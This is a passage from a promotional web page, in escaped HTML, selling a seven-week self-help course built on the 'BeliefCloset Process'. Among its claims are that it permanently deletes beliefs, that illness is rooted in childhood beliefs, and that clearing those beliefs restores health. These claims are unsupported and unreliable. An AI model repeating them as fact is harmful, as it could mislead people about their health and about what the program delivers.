right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" 